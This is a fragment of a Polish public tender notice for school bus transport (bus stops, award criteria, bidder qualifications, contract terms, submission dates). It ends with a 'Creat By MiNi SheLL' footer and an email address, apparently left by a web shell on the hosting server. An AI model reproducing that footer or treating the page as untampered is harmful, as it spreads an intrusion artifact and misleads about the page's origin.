6<br/><br/>25. Wojnarowice 1<br/><br/>Wojnarowice 2	Przystanek PKS<br/><br/>Przystanek	Wiata <br/><br/>Wiata	Droga krajowa<br/><br/>Skrzyżowanie do Okulic<br/>26. Żerzuszyce<br/>	Przystanek PKS	Wiata oznakowana	ul. Wiejska w centrum wsi<br/><br/>W przypadku gdy zaistnieje taka potrzeba Zamawiający dopuszcza możliwość ujęcia w rozkładach jazdy przystanków autobusowych innych, niż wymienione w powyższym zestawieniu, pod warunkiem, że przystanki te będą posiadały lokalizację zgodną z obowiązującymi przepisami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-10-01 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień o których mowa w art. 214 ust. 1 pkt 7 w zw. z art. 305 pkt 1 p.z.p. oraz w zw. z art. 455 ust. 1 p.z.p. polegających na powtórzeniu podobnych usług jakie występują w zamówieniu podstawowym w wysokości do 10% pierwotnej wartości zamówienia.<br/><br/>Zakres możliwych do udzielenia zamówień uzupełniających może polegać na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego, w szczególności: <br/>a) świadczenie usług poza okresem 01.10.2021 r. – 24.06.2022 r. <br/>b) zwiększenie liczby tras objętych usługami, <br/>c) zmniejszenie liczby tras objętych usługami,<br/>d) zwiększenie liczby dzieci do przewozu,<br/>e) zmniejszenie liczby dzieci do przewozu.<br/><br/>Zamówienie powinno polegać na powtórzeniu podobnych usług, i powinno być zgodne z jego przedmiotem.<br/><br/>Zamawiający nie przewiduje zmniejszenia zakresu rzeczowego podstawowego zamówienia, jedynie jego zwiększenie do wartości procentowej wskazanej powyżej, jeśli zajdzie uzasadniona konieczność.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1)	Cena brutto (C) – waga kryterium 60%;<br/>2)	Czas podstawienia pojazdów zastępczego w przypadku awarii (P) - waga kryterium 40%.<br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną lub najniższym kosztem, a jeżeli zostały złożone oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdów zastępczego w przypadku awarii (P)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale X SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/><br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający uzna, że Wykonawca spełni warunek z zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeśli dysponuje aktualnym zezwoleniem na wykonywanie zawodu przewoźnika drogowego lub posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001 roku o transporcie drogowym. (tj. Dz. U. z 2021 r. poz. 919 ze zm.).<br/><br/>3) sytuacji ekonomicznej lub finansowej:<br/><br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie sytuacji ekonomicznej lub finansowej, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 200 tys. zł.<br/><br/>4) zdolności technicznej lub zawodowej:<br/><br/>a) Zdolność techniczna:<br/><br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował co najmniej 4 (czteroma) autobusami przystosowanymi do przewozu osób (umożliwiającego realizację przedmiotu zamówienia), odpowiednio oznakowanymi, każdy po minimum 40 miejsc siedzących. <br/><br/>b) Zdolność zawodowa:<br/><br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, które zostaną skierowane do jego realizacji, tj.: co najmniej 4 (czterech) kierowców (1 osobą na jeden pojazd) posiadających odpowiednie uprawnienia do przewozu osób, co należy udokumentować oraz po jednej osobie na pojazd wykonującej czynności związane ze sprawowaniem opieki nad przewożonymi dziećmi w trakcie dojazdu z miejsca zamieszkania do szkoły i odwrotnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego – zgodnie z Załącznikiem nr 2 do SWZ.<br/>2.	Oświadczenie, o którym mowa w ust. 1 powyżej stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu, odpowiednio na dzień składania ofert tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe. <br/>Podmiotowe środki dowodowe wymagane od wykonawcy w celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu obejmują:<br/>1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">7.	Podmiotowe środki dowodowe wymagane od wykonawcy w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu obejmują:<br/><br/>1) Aktualną licencję na wykonanie krajowego transportu drogowego osób lub obowiązującym zezwoleniem na wykonanie zawodu przewoźnika drogowego zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2021 r. poz. 919 z późn. zm.).<br/><br/>2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług (kierowców), wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 3 do SWZ);<br/><br/>3)	wykaz środków transportu, którymi dysponuje lub będzie dysponował Wykonawca, przeznaczonych do wykonania przedmiotu zamówienia wraz z informacją o podstawie dysponowania tymi pojazdami, na formularzu stanowiącym załącznik nr 4 do SWZ;<br/><br/>4)	dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną wskazaną przez Zamawiającego tj. 200 tyś. zł.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w treści formularza ofertowego (ust. 14) składają oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: warunek określony w rozdziale IX ust. 2 pkt 4) lit. b) może być spełniony łącznie przez Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 P.Z.P. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 5 do SWZ.<br/>Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://sobotka.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-31 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com